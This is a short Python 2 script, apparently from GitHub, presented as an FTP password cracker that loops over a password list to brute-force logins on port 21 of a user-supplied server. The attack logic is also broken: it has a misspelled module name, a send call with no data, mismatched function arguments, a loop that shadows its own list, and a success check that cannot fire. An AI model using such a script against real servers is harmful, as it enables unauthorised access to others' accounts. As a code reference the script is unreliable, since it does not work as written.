#!/usr/bin/env python
"""
Original Author: Jack Clark
Language: Python
Purpose: Connects, and cracks an FTP password with a pPython script
Published: GitHub
Contributers: (Will be listed as others contribute)
Edit Dates: 
4/6/2015 (Original Writing)

"""
# Imports
import socket
import re
import sys
# This will establish connection to server
def connect(username, password, IP_ADDRESS):
	s = socket.socket(socket.AF_INET, sockect.SOCK_STREAM)

	print "[*] Trying "+ username + ":" + password
	
	s.connect((IP_ADDRESS, 21))

	data = s.recv(1024)

	s.send()

# Essential Variables

IP_ADDRESS = raw_input("What is the IP address of the server?:")

username = raw_input("What is the username?:")

"""
What you need to do is to add potential passwords
to an array, you can also add a text file of these passwords in order
to run brutefore and dictionary attacks using this script.
"""
passwords = []

# Start password cracking loop

for passwords in passwords:

	attempt = connect(username, password)

	if attempt == "230":
		print "[*] Password found: "+ password
		sys.exit(0)
